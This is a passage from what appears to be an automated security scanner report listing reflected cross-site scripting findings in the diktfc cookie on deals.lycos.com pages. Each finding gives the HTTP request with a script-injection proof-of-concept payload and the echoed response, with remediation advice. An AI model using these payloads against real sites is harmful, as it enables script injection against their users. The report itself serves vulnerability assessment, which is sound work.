Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7&amp;cj=1" alt="tracker" />
...[SNIP]...

1.245. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f39"%3balert(1)//768516f1e93 was submitted in the diktfc cookie. This input was echoed as 19f39";alert(1)//768516f1e93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39"%3balert(1)//768516f1e93; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
avascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39";alert(1)//768516f1e93"
});
</script>
...[SNIP]...

1.246. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf0"><script>alert(1)</script>f4b8c206198 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
c="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198&amp;cj=1" alt="tracker" />
...[SNIP]...

1.247. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-camileo-1080p-digital-camcorder-89-414580

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201be"%3balert(1)//8d2c55d7ace was submitted in the diktfc cookie. This input was echoed as 201be";alert(1)//8d2c55d7ace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be"%3balert(1)//8d2c55d7ace; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be";alert(1)//8d2c55d7ace"
});
</script>
...[SNIP]...

1.248. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-camileo-1080p-digital-camcorder-89-414580

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d968"><script>alert(1)</script>3e8a43ed830 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830&amp;cj=1" alt="tracker" />
...[SNIP]...

1.249. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/unlocked-mytouch-4g-smartphone-for-440-414260

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf004"><script>alert(1)</script>d27db054aad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad&amp;cj=1" alt="tracker" />
...[SNIP]...

1.250. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/unlocked-mytouch-4g-smartphone-for-440-414260

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c684"%3balert(1)//37756b92c68 was submitted in the diktfc cookie. This input was echoed as 7c684";alert(1)//37756b92c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684"%3balert(1)//37756b92c68; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684";alert(1)//37756b92c68"
});
</script>
...[SNIP]...

1.251. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/viore-24-1080p-lcd-hdtv-for-199-414568

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7f1"><script>alert(1)</script>c910f4ec3ad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:20 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad&amp;cj=1" alt="tracker" />
...[SNIP]...

1.252. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/viore-24-1080p-lcd-hdtv-for-199-414568

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fc0a"%3balert(1)//0e43978a264 was submitted in the diktfc cookie. This input was echoed as 1fc0a";alert(1)//0e43978a264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a"%3balert(1)//0e43978a264; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:21 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a";alert(1)//0e43978a264"
});
</script>
...[SNIP]...

1.253. http://deals.lycos.com/deals [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1982"%3balert(1)//13da987201f was submitted in the diktfc cookie. This input was echoed as e1982";alert(1)//13da987201f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982"%3balert(1)//13da987201f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982";alert(1)//13da987201f"
});
</script>
...[SNIP]...

1.254. http://deals.lycos.com/deals [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05d3"><script>alert(1)</script>ce60a599871 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871&amp;cj=1" alt="tracker" />
...[SNIP]...

1.255. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25659"><script>alert(1)</script>669e5c4d6cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

